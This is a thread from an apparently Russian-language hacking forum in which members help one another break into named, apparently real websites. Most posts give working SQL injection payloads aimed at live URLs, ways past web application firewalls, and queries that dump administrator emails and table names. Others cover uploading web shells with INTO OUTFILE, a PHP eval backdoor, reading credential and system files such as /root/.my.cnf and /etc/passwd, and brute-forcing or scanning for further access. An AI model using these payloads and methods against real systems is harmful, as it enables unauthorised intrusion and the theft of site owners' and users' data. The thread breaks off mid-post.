(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1,1),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

и перебирайте лимитом все поля

и, кстати, можно проще запрос


Code:
and(extractvalue(1,concat(0x3a,(select+table_name+ from+information_schema.tables+limit+5,1))))

UPDATE:


Code:
1'and(extractvalue(1,concat(0x3a,(select+table_nam e+from+information_schema.tables+limit+5,1))))='1

вот так должно сработать

faza02 said:

Code:
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1,1),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

и перебирайте лимитом все поля
и, кстати, можно проще запрос

Code:
and(extractvalue(1,concat(0x3a,(select+table_name+ from+information_schema.tables+limit+5,1))))--+



спасибо ,вот проще не идёт

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '";}',

можно ещё вопросик

что я опять делаю не так

(SELECT COUNT(*),CONCAT((SELECT id FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

возращает 16

а

(SELECT COUNT(*),CONCAT((SELECT email FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

возращает

Subquery returns more than 1 row

(((

madam said:
можно ещё вопросик
что я опять делаю не так
(SELECT COUNT(*),CONCAT((SELECT id FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
возращает 16
а
(SELECT COUNT(*),CONCAT((SELECT email FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
возращает
Subquery returns more than 1 row
(((


попробуйте так:


Code:
(SELECT COUNT(*),CONCAT((SELECT email FROM administrators WHERE id = 16),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

изменив на нужный id.

faza02 said:
попробуйте так:

Code:
(SELECT COUNT(*),CONCAT((SELECT email FROM administrators WHERE id = 16),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

изменив на нужный id.


((

Subquery returns more than 1 row

madam said:
((
Subquery returns more than 1 row




Code:
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT substr(group_concat(email),1,150) FROM administrator),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

если проблема не решится, отпишите мне в jabber, не стоит захламлять тему. вам бы для начала прочитать маны mysql неплохо бы было.

Спасибо,почти решилась,дальше разберусь

madam said:
можно ещё вопросик
что я опять делаю не так
(SELECT COUNT(*),CONCAT((SELECT id FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
возращает 16
а
(SELECT COUNT(*),CONCAT((SELECT email FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
возращает
Subquery returns more than 1 row
(((




Code:
(SELECT COUNT(*),CONCAT((SELECT mid(email,1,20) FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

есть


http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(versi on())))))='1


user() фильтрует, как я понял "table_name" фильтрует, мб кто подскажет что нибудь?


http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select+mid(T Able_NaMe,1,31)+from+information_schema.tables)))) ='1


PS много запросов не делайте часто, забанит

Br@!ns said:
есть
user() фильтрует, как я понял "table_name" фильтрует, мб кто подскажет что нибудь?
PS много запросов не делайте часто, забанит




Code:
http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(g roup_concat(/*!table_name*/),1,31))from(information_schema.tables)))))='1

http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(g roup_concat(/*!table_name*/),32,63))from(information_schema.tables)))))='1

как обойти такую WAF?


HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+order+by+5+--+



HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+union(select(1,2,3,4))+--+

фильтрует комбинацию union+select и concat

Br@!ns said:
как обойти такую WAF?

HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+order+by+5+--+


HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+union(select(1,2,3,4))+--+

фильтрует комбинацию union+select и concat


Старая версия модсесурити. В скрипте два запроса подряд с разным количеством полей, 4 и 7.


Code:
/store/?cat_id=43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x

madhatter said:
Старая версия модсесурити. В скрипте два запроса подряд с разным количеством полей, 4 и 7.

Code:
/store/?cat_id=43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x




а как дальше вот это обойти можно?


HTML:
https://www.swallowtailfarms.com//store/?cat_id=43'/*!50000union*/+/*!50000select*/+1,2,table_name,4,5,version(),7+from/**/information_schema.tables--%20

докручивай через post запрос, там error-based.

http://savepic.su/4550027.png

http://savepic.su/4554123.png

Не получается обойти фильтр на слово information_schema.

/*!information_schema*/ , dgsdginformation_schemasdgsdg, частичное и полное url кодирование не помогают, какие еще варианты есть?

http://www.globekey.com/weblink/index.php?hid=USM5829k'+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16+--+

сайт банит ip при неудачных попытках

Br@!ns said:
Не получается обойти фильтр на слово information_schema.
/*!information_schema*/ , dgsdginformation_schemasdgsdg, частичное и полное url кодирование не помогают, какие еще варианты есть?
http://www.globekey.com/weblink/index.php?hid=USM5829k'+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16+--+
сайт банит ip при неудачных попытках


Щас выложат и завтра уже залепят новый фильтр. А по сути реально способов обойти mod security и подобные WAF не так уж и много и почти все уже в фильтрах.

не получается обойти waf с фильтром на union select, selecr from. какие решениея есть? мб етсь возможность составить запрос, гду from будет впереди select, или как нибудь по-другому??

http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+||@:=10+group+by+left(version(),@:=~ @)having+min(0)

Br@!ns said:
не получается обойти waf с фильтром на union select, selecr from. какие решениея есть? мб етсь возможность составить запрос, гду from будет впереди select, или как нибудь по-другому??
http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+||@:=10+group+by+left(version(),@:=~ @)having+min(0)


http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+or+1+group+by+concat((select+table_n ame+%0A+from+information_schema.tables+limit+1,1), floor(rand(0)*2))having+min(0)

разбиваем запрос переносом строки

Br@!ns said:
не получается обойти waf с фильтром на union select, selecr from. какие решениея есть? мб етсь возможность составить запрос, гду from будет впереди select, или как нибудь по-другому??
http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+||@:=10+group+by+left(version(),@:=~ @)having+min(0)




Code:
http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029||@:=10+group+by+left((select%23+faza %0Atable_name+from+information_schema.tables+limit +1,1),@:=~@)having+min(0)

Подскажите как можно залить шелл через phpmyadmin. Не root

Есть пути, пробовал через SELECT '' INTO OUTFILE '/путь/shell.php'

#1045 - Access denied for user 'user'@'localhost' (using password: YES)

Версия MySQL-клиента: 5.1.73

Пробовал вывести на страницы код php, но выводит как текст.

Интересуют всевозможные способы.

I love this game said:
Подскажите как можно залить шелл через phpmyadmin.
Не root
Есть пути, пробовал через SELECT '' INTO OUTFILE '/путь/shell.php'
#1045 - Access denied for user 'user'@'localhost' (using password: YES)
Версия MySQL-клиента: 5.1.73
Пробовал вывести на страницы код php, но выводит как текст.
Интересуют всевозможные способы.


Никак, прав нету

I love this game said:
Подскажите как можно залить шелл через phpmyadmin.
Не root
Есть пути, пробовал через SELECT '' INTO OUTFILE '/путь/shell.php'
#1045 - Access denied for user 'user'@'localhost' (using password: YES)
Версия MySQL-клиента: 5.1.73
Пробовал вывести на страницы код php, но выводит как текст.
Интересуют всевозможные способы.


без рута не как. так как нету прав на запить. сам когда то мучался пару месяцев. ищи в базе возможно есть база цмс какойто через которую можно залить

Вы все неправы, можно залиться

https://rdot.org/forum/showthread.php?t=741

Strilo4ka said:
Вы все неправы, можно залиться
https://rdot.org/forum/showthread.php?t=741


в топике нет ни слова про заливку

только чтение

psihoz26 said:
в топике нет ни слова про заливку
только чтение


А Вы головой подумайте.

Strilo4ka said:
Вы все неправы, можно залиться
https://rdot.org/forum/showthread.php?t=741


Спасибо, если я правильно понял, ты ты намекаешь, на то что можно прочитать любые файлы. Если так, то работает, но вряд ли поможет залить шелл. Или же все-таки можно при помощи LOAD DATA INFILE как-то напрямую залить шелл? Я просто не силен в MySQL.

I love this game said:
Спасибо, если я правильно понял, ты ты намекаешь, на то что можно прочитать любые файлы. Если так, то работает, но вряд ли поможет залить шелл. Или же все-таки можно при помощи LOAD DATA INFILE как-то напрямую залить шелл? Я просто не силен в MySQL.


Прочитай конфиги мускула и зайди уже из под рута.

kingbeef said:
Прочитай конфиги мускула и зайди уже из под рута.


Прочитал этот файл /etc/mysql/my.cnf

Но пароля там нет.

Пытаюсь этот прочитать

LOAD DATA LOCAL INFILE '/root/.my.cnf' INTO TABLE mytable FIELDS TERMINATED BY '\n'

Выдает ошибку.

#13 - File '/root/.my.cnf' not found (Errcode: 13)

Upd. Еще у меня есть форма входа в ISP Manager. Может от него можно как-то узнать логин и пас?

хм.. пробовал


Code:
LOAD DATA LOCAL INFILE '/etc/mysql/my.cnf' INTO TABLE test FIELDS TERMINATED BY '\n'

выдает


Code:
#2000 - open_basedir restriction in effect. Unable to open file

или файл не найден на старых версиях пхпмайадмина


Code:
#2 - File '/etc/mysql/my.cnf' not found (Errcode: 2)
#13 - File '/root/.my.cnf' not found (Errcode: 13)

и так на больше 10 майадминов без рута

https://store.tonibrattin.com/list.php?catid=7'&secid=&keyword=67&sort=ItemPrice'


Можно тут что нибудь сделать?

фильтрует запятые, скобки

http://stagerp.ru/donate^DonateForm[server]=0&DonateForm[system]=0&DonateForm[sum]=WCRTESTINPUT000000&DonateForm[username]=1
http://stagerp.ru/stage/login^LoginForm[password]=WCRTESTINPUT000001&LoginForm[captcha]=WCRTESTINPUT000002&LoginForm[rememberMe]=0&LoginForm[server]=0&LoginForm[username]=1
http://stagerp.ru/forum/index.php?app=core&module=global&section=login&do=process^ips_password=WCRTESTINPUT000001&auth_key=880ea6a14ea49e853634fbdc5015a024&referer=http://stagerp.ru/forum/&ips_username=1


Wulnerable это выдал.

Можно здесь что-нибудь сделать?

Br@!ns said:
Можно тут что нибудь сделать?
фильтрует запятые, скобки


inj в order by — значит только blind или error-based. фильтр на = и (

урленкод и даблурленкод тоже не помог, да и векторов без использования скобок я не видел.

Парни кто поможет с моим вопросом? Буду очень благодарен!


kingbeef said:
Прочитай конфиги мускула и зайди уже из под рута.




I love this game said:
Прочитал этот файл /etc/mysql/my.cnf
Но пароля там нет.
Пытаюсь этот прочитать
LOAD DATA LOCAL INFILE '/root/.my.cnf' INTO TABLE mytable FIELDS TERMINATED BY '\n'
Выдает ошибку.
#13 - File '/root/.my.cnf' not found (Errcode: 13)
Upd. Еще у меня есть форма входа в ISP Manager. Может от него можно как-то узнать логин и пас?

I love this game said:
Парни кто поможет с моим вопросом? Буду очень благодарен!


по моему вариант что в том файле будет пароль рута 1 на милион

иногда тут 'etc/passwd' бывают пароли открытые

I love this game said:
Парни кто поможет с моим вопросом? Буду очень благодарен!


в файле etc/my.conf нет паролей от мускуля. пароли от пользователей мускуля хранятся обыно в таблицах и в зашифрованом виде. таблицы хранятся в файлах. которые хранятся в каталоге. каталог можно посмотреть в файле etc/my.conf переменная datadir

Советую искать пароли от юзеров мускуля в скриптах и конфигах. 100% что там они будут в открытом виде.

в /etc/passwd уже не один дистр по дефолту уже пароли не хранит

ph1l1ster said:
в файле etc/my.conf нет паролей от мускуля. пароли от пользователей мускуля хранятся обыно в таблицах и в зашифрованом виде. таблицы хранятся в файлах. которые хранятся в каталоге. каталог можно посмотреть в файле etc/my.conf переменная datadir
Советую искать пароли от юзеров мускуля в скриптах и конфигах. 100% что там они будут в открытом виде.
в /etc/passwd уже не один дистр по дефолту уже пароли не хранит


/etc/my.conf не читает

/etc/mysql/my.cnf показал datadir:

/var/lib/mysql

Как дальше быть? Ну все что я нашел в скриптах и фалах, это логин и пароль не от рута, с него я и делаю эти запросы. Есть еще ISP Manager. Может от него как-то можно найти пароли или он как-то сможет помочь? Нужно любым способом залить шелл.

Phpinfo тоже есть.

Может каким-то образом можно получить структуру файлов и папок?

I love this game said:
/etc/my.conf не читает
/etc/mysql/my.cnf показал datadir:
/var/lib/mysql
Как дальше быть? Ну все что я нашел в скриптах и фалах, это логин и пароль не от рута, с него я и делаю эти запросы. Есть еще ISP Manager. Может от него как-то можно найти пароли или он как-то сможет помочь? Нужно любым способом залить шелл.
Phpinfo тоже есть.
Может каким-то образом можно получить структуру файлов и папок?


структуру только брутфорсом и раскрытием путей. если есть phpinfo, стоит посмотреть L/RFI. стоит просканить порты и директории, посмотреть, что на них. узнайте, что за хостер, попробуйте выяснить местоположение phpmyadmin. загляните в .bash_history и другие интересные файлы, нередко там встречается интересная информация. пробовали пароль от mysql для ssh, ftp? посмотрите passwd и пользователей оттуда, брутфорс никто не отменял. просканируйте поддмены, dnsenum, pyknock, AXFR.

одной SQLi хек не ограничивается.

есть сайт, заливаю шел а он сразу трется, пробовал разные штук 5 все трет.

заливаю


Code:
eval($_REQUEST[e]);

вывожу пхпинфо, но там нету путей, только до пхп и мускула, а на папку домена нету.

как через евал можно прочитать файл конфиг например, или раскрыть пути


Code:
$page = $_GET['page'];
include($page.'.php');

тоже пробовал. не работает.

в общем могу залить любой пхп кроме шелов(( подскажите что можно сделать в данном случае

mazaxaka said:
есть сайт, заливаю шел а он сразу трется, пробовал разные штук 5 все трет.
заливаю

Code:
eval($_REQUEST[e]);

вывожу пхпинфо, но там нету путей, только до пхп и мускула, а на папку домена нету.
как через евал можно прочитать файл конфиг например, или раскрыть пути

Code:
$page = $_GET['page'];
include($page.'.php');

тоже пробовал. не работает.
в общем могу залить любой пхп кроме шелов(( подскажите что можно сделать в данном случае


через системные команды посмотреть?

mazaxaka said:
есть сайт, заливаю шел а он сразу трется, пробовал разные штук 5 все трет.
заливаю

Code:
eval($_REQUEST[e]);

вывожу пхпинфо, но там нету путей, только до пхп и мускула, а на папку домена нету.
как через евал можно прочитать файл конфиг например, или раскрыть пути

Code:
$page = $_GET['page'];
include($page.'.php');

тоже пробовал. не работает.
в общем могу залить любой пхп кроме шелов(( подскажите что можно сделать в данном случае


Покажет текущию папку где выполняется скрипт:


PHP:
echodirname(__FILE__);

если вывод ошибок не отключен, то как вариант можно использовать баги в функциях:


PHP:
echohtmlspecialchars($_REQUEST[e]);

вызываем так: ?e[]=123 будет раскрытие путей.

Чтобы прочитать файл конфига, можно сделать так:


PHP:
echofile_get_contents('config.php');

это всего лишь банальные команды, а если системные будут включены там вообще все намного проще и очень странно, что вам phpinfo(), очень мало инфы выдало...

По поводу заливки, наверное просто какой то мод секьюрити не дает им залиться, а скорее заливаются но права автоматически на выполнение закрываются, попробуйте какой нить обычный файловый менеджер залить или упрощенный шелл, также можно попробовать поменять расширение шелла.

вопрос по файлу wp-config.php

есть доступ к файлу конфигурации вп. Как можно получить доступ к сайту?

В файле есть логин и пароль для базы данных, но как зайти в базу данных?

T1B3R said:
вопрос по файлу wp-config.php
есть доступ к файлу конфигурации вп. Как можно получить доступ к сайту?
В файле есть логин и пароль для базы данных, но как зайти в базу данных?


Никак

Zen1T21 said:
Никак


С чего ты взял? Есть шанс, что СУБД находится рядом с сайтом.

А вообще пароль может быть таким же как и от админки, этот факт тоже нужно учитывать.

MaxFast said:
С чего ты взял? Есть шанс, что СУБД находится рядом с сайтом.


Ничтожный же шанс.


MaxFast said:
А вообще пароль может быть таким же как и от админки, этот факт тоже нужно учитывать.


Вопрос про бд вроде был

Code:
...php?ID=12234+AND+1=1

-> истинный вывод


Code:
...php?ID=12234+AND+1=2

-> неверный вывод

В общем, boolean based, mysql. Как раскручивать? Обычно я sqlmap'ом слепые раскручиваю, но тут типа [CRITICAL] unable to retrieve the database names

Zen1T21 said:
Ничтожный же шанс.
Вопрос про бд вроде был


«Никак» это означает, что шансов нет. Да и смотреть нужно на конкретную ситуацию, о которой вы даже не знаете. Не стоит вводить в заблуждение.

Ответ: да, можно. Ищите на портах, в папках, поддоменах.

vikler said:

Code:
...php?ID=12234+AND+1=1

-> истинный вывод

Code:
...php?ID=12234+AND+1=2

-> неверный вывод
В общем, boolean based, mysql. Как раскручивать? Обычно я sqlmap'ом слепые раскручиваю, но тут типа [CRITICAL] unable to retrieve the database names


and(subsrt((select table_name from information_schema.tables limit 1,1),1,1))='c'

еще такой вопрос возник, есть бд file-priv n

цмс вордпрес.добовляю нового админа. гружу через плагины.или не грузится или отображает код шелла, вп 3.6-4.0 есть варианты загрузить или проинклудить както?

П.с плагины редактировать не могу и тему изменять тоже, везде пишет


Code:
Чтобы сохранить изменения, нужно сделать этот файл доступным для записи. Дополнительную информацию можно получить в Кодексе.

winstrool said:
Покажет текущию папку где выполняется скрипт:

PHP:
echodirname(__FILE__);

если вывод ошибок не отключен, то как вариант можно использовать баги в функциях:

PHP:
echohtmlspecialchars($_REQUEST[e]);

вызываем так:
?e[]=123
будет раскрытие путей.
Чтобы прочитать файл конфига, можно сделать так:

PHP:
echofile_get_contents('config.php');

это всего лишь банальные команды, а если системные будут включены там вообще все намного проще и очень странно, что вам phpinfo(), очень мало инфы выдало...
По поводу заливки, наверное просто какой то мод секьюрити не дает им залиться, а скорее заливаются но права автоматически на выполнение закрываются, попробуйте какой нить обычный файловый менеджер залить или упрощенный шелл, также можно попробовать поменять расширение шелла.


не знаю почему но пхпинфо вообще подчти нефига не показывает.

спасибо, через


Code:
echo dirname(__FILE__);

путь нашел


Code:
echo file_get_contents('config.php');

не читает конфиг. перепробовал уйму вариантов.

файл менеджер пишет 404, упрощеные шеллы не выполняются показывает исходный код,хотя файлы пхп с хело ворлд льются и запускаются как нужно...

да бы не плодить кучу сообщений


Code:
LOAD DATA LOCAL INFILE '/home/h41954/data/www/' INTO TABLE test FIELDS TERMINATED BY '\n'

я так понял LOAD DATA LOCAL INFILE работает на myslq до 5 ветки только?

mazaxaka said:
не знаю почему но пхпинфо вообще подчти нефига не показывает.
спасибо, через

Code:
echo dirname(__FILE__);

путь нашел

Code:
echo file_get_contents('config.php');

не читает конфиг. перепробовал уйму вариантов.
файл менеджер пишет 404, упрощеные шеллы не выполняются показывает исходный код,хотя файлы пхп с хело ворлд льются и запускаются как нужно...
да бы не плодить кучу сообщений

Code:
LOAD DATA LOCAL INFILE '/home/h41954/data/www/' INTO TABLE test FIELDS TERMINATED BY '\n'

я так понял LOAD DATA LOCAL INFILE работает на myslq до 5 ветки только?


нет, работает с 3 ветки. (с 3.22.6)

пхпхинфо в студию.

Вообщем случайно наткнулся на скуль, и решил попробовать крутануть ее. (havij'em))

Не буду ходить вокруг до около. Опишу сразу все что пробовал и что не получается.

Вообщем мускул работает от рута, на пользователя Root в мускуле даже пасса нет)

Читаются все файлы на сервере, причем не только файлы но и например в хавиже запрос на чтение по такому пути /usr/home/www/htdocs/

Вижу какие папки и файлы находятся в каталоге htdocs

Вообщем все папки и файлы читаются на сервере.

На самом сайте есть админка и она защищена .htpasswd

Читаю .htpasswd выдираю логин пасс, воожу , не пускает.

На сервере так же есть еще пару сайтов и везде в админку .htpasswd, но не пускает никуда(читал где то что в htaccess путь не правельно указан к htpasswd) вообще забил на такой способ попасть в админку.

Так же на сервере есть phpmyadmin, доступ к нему идет через htaccess

в файле .htaccess


Code:

AuthName authorization
AuthType Basic

AuthPwcheckActive On
AuthPwcheckAuthoritative On
require group rusers
satisfy any


Order deny,allow
Deny from all

CharsetDisable On


Собственно вариант попасть в phpmyadmin я тоже исключил.

Решил попробовать через функцию Query в хавиже залить мини шелл таким образом


Code:
SELECT '' into outfile '/tmp/123.php'

хавиж ошибку не выдал но и ничего вообще не произошло после запроса.

Сообственно файл тоже не создался в tmp

а да, забыл сообщить что FILE_PRIV = Y

Ребят, очень нужно залится на сайт этот) очень жирный и полезный сайт. Прошу помощи.

А еще попрошу не пинать за хавиж!)

faza02 said:
нет, работает с 3 ветки. (с 3.22.6)
пхпхинфо в студию.


странно. на 2х mysql 5.** ветки пишет что не поддерживается версией

GroM88 said:
Вообщем случайно наткнулся на скуль, и решил попробовать крутануть ее. (havij'em))
Не буду ходить вокруг до около. Опишу сразу все что пробовал и что не получается.
Вообщем мускул работает от рута, на пользователя Root в мускуле даже пасса нет)
Читаются все файлы на сервере, причем не только файлы но и например в хавиже запрос на чтение по такому пути
/usr/home/www/htdocs/
Вижу какие папки и файлы находятся в каталоге htdocs
Вообщем все папки и файлы читаются на сервере.
На самом сайте есть админка и она защищена .htpasswd
Читаю .htpasswd выдираю логин пасс, воожу , не пускает.
На сервере так же есть еще пару сайтов и везде в админку .htpasswd, но не пускает никуда(читал где то что в htaccess путь не правельно указан к htpasswd) вообще забил на такой способ попасть в админку.
Так же на сервере есть phpmyadmin, доступ к нему идет через htaccess
в файле .htaccess

Code:

AuthName authorization
AuthType Basic

AuthPwcheckActive On
AuthPwcheckAuthoritative On
require group rusers
satisfy any


Order deny,allow
Deny from all

CharsetDisable On


Собственно вариант попасть в phpmyadmin я тоже исключил.
Решил попробовать через функцию Query в хавиже залить мини шелл таким образом

Code:
SELECT '' into outfile '/tmp/123.php'

хавиж ошибку не выдал но и ничего вообще не произошло после запроса.
Сообственно файл тоже не создался в tmp
а да, забыл сообщить что FILE_PRIV = Y
Ребят, очень нужно залится на сайт этот) очень жирный и полезный сайт. Прошу помощи.
А еще попрошу не пинать за хавиж!)


попробуй в диру сайта лить, найти папку для записи, руками а не через хавиж, возможно глюк в нём!

Кстати, возможно ковычки ' вызывают ошибку, но хавиж может тебе и не показать, будешь руками запросы посылась сам увидешь в чём проблема!

DezMond™ said:
попробуй в диру сайта лить, найти папку для записи, руками а не через хавиж, возможно глюк в нём!
Кстати, возможно ковычки ' вызывают ошибку, но хавиж может тебе и не показать, будешь руками запросы посылась сам увидешь в чём проблема!


я пробовал уже) лил в папки которые доступны для записи... ноль эффекта.

прочитал php.ini

magic_quotes=off

так что кавычки врятли тут роль играют)

сам пост/гет параметр можешь вызвать php ошибку, я не про фильтр говорю

Откуда ты узнал, что папки доступны на запись?

DezMond™ said:
сам пост/гет параметр можешь вызвать php ошибку, я не про фильтр говорю
Откуда ты узнал, что папки доступны на запись?


Ну вообще прочитал скрипт для залития изображений из админки. там четко написанно что картинки и файлы будут заливатся в ту папку( ну и сообственно в папке этой куча грязи всякой)

Ну а вообще я редко раньше встречал что бы /tmp/ была закрыта на запись)

Поможешь в аське если есть время конешно, не хочу тут позорится просто : ))

GroM88 said:
Ну вообще прочитал скрипт для залития изображений из админки. там четко написанно что картинки и файлы будут заливатся в ту папку( ну и сообственно в папке этой куча грязи всякой)
Ну а вообще я редко раньше встречал что бы /tmp/ была закрыта на запись)
Поможешь в аське если есть время конешно, не хочу тут позорится просто : ))


пиши в асю гляну, права mysql могут отличасть от php, и там где может залить пхп скрипт, мускул может не залить файл!

mazaxaka said:
странно. на 2х mysql 5.** ветки пишет что не поддерживается версией


может быть она просто выключена? по дефолту, обычно, вкл.

присутствует в 5.7 и ниже http://dev.mysql.com/doc/refman/5.7/en/load-data.html

ребята кто знает как определить имя таблицы в sql инъекции error-based

ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema


Code:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(sel ect+version())))

но продвинутся дальше не получается не знаю префикса названия таблиц

вопрос как вызвать ошибку с названием таблицы в ней?

x_Lex said:
ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , найдена инъекция

Code:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(sel ect+version())))

но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней
?


1. select table_name form information_schema.tables limit 1

2. За сколько акк купили

select table_name from information_schema.tables limit 1,1 вместо select version()

с такими вопросами вам лучше сначала почитать статьи

GroM88 said:
я пробовал уже) лил в папки которые доступны для записи... ноль эффекта.
прочитал php.ini
magic_quotes=off
так что кавычки врятли тут роль играют)



Ну во первых, как советуют выкинь Хавидж и сделай вручную.

К тому же переведи в HEX колонку к виду 0x0000000 и

SELECT 0x0000 INTO OUTFILE /path

К тому-же, tmp это который /tmp в корне сервера или в локации вебкорня? Тот что в корне сервера, на самом деле для всех должен быть доступен на запись, а вот любые, даже кешевые и тп директории внутри вебкорня для отличных от пользователя под которым работает php(etc) могут иметь права строго ограничивающие доступ

UXOR said:

x_Lex said:
ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema

Code:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(sel ect+version())))

но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней
?


1. select table_name form information_schema.tables limit 1
2. За сколько акк купили


" if author else f"

UXOR said:

x_Lex said:
ребята кто знает как определить имя таблицы в sql инъекции error-based
ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema

Code:
&orderby=1+and+extractvalue(rand(),concat(0x3a,(sel ect+version())))

но продвинутся дальше не получается не знаю префикса названия таблиц
вопрос как вызвать ошибку с названием таблицы в ней
?


1. select table_name form information_schema.tables limit 1
2. За сколько акк купили




faza02 said:
select table_name from information_schema.tables limit 1,1 вместо select version()
с такими вопросами вам лучше сначала почитать статьи


а блин забыл упомянуть что нет доступа с базе information_schema

vikler said:
Нестандартная скула - результат пост-запроса. В общем, как дальше быть? Или ничего нельзя сделать?

Code:
http:// www.f avorite-picture. com/pictures/search/ffffff.html

=>

Code:
http:// www.f avorite-picture. com/pictures/search/ffffff'.html



Какого пост-запроса?

Стандартгая ситуация у Вас, вектор - error based:


http://www.favorite-picture.com/pictures/search/ffffff'*(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a)*'.html

vikler said:
Нестандартная скула - результат пост-запроса. В общем, как дальше быть? Или ничего нельзя сделать?

Code:
http:// www.f avorite-picture. com/pictures/search/ffffff.html

=>

Code:
http:// www.f avorite-picture. com/pictures/search/ffffff'.html



+ к посту YaBtr

Заменяем пробелы на %20

Union Based

http://www.favorite-picture.com/pictures/search/ffffff')and(1)=2%20order%20by%203%23.html

http://www.favorite-picture.com/pictures/search/miss')and(1)=1%20union%20select%20@@version,222%23 .html

Boolean Based

http://www.favorite-picture.com/pictures/search/ffffff')and(1='1.html

http://www.favorite-picture.com/pictures/search/ffffff')and(1)=1%23.html

Error Based Classic

http://www.favorite-picture.com/pictures/search/miss')or%20(select%20count(*)%20from%20(select%201 %20union%20select%202%20union%20select%203)x%20gro up%20by%20concat(version(),floor(rand(0)*2)))%23.h tml

Duplicate entry '5.5.38-0+wheezy11'

x_Lex said:
а блин забыл упомянуть что нет доступа с базе information_schema


вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой

x_Lex said:
а блин забыл упомянуть что нет доступа с базе information_schema


Во первых попробовать так: `information_schema`.xxx.

Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда

faza02 said:
вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой


нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema


Cennarios said:
Во первых попробовать так: `information_schema`.xxx.
Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда


да перебрал все таблицы из базы information_schema по нулям 99.9% нет доступа к information_schema

Code:
http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27

Там parameter length constraint mechanism. Как обойти для вывода?

vikler said:

Code:
http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27

Там parameter length constraint mechanism. Как обойти для вывода?


чтобы не мучаться с этим, есть еще post sqli в форме входа

http://hollywoodnewswire.net/scripts/login.php


x_Lex said:
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema


тогда вспоминайте, мне данные способы неизвестны.

x_Lex said:
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema


Брут!

faza02 said:
чтобы не мучаться с этим, есть еще post sqli в форме входа
http://hollywoodnewswire.net/scripts/login.php


Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?

Есть запрос "


Code:
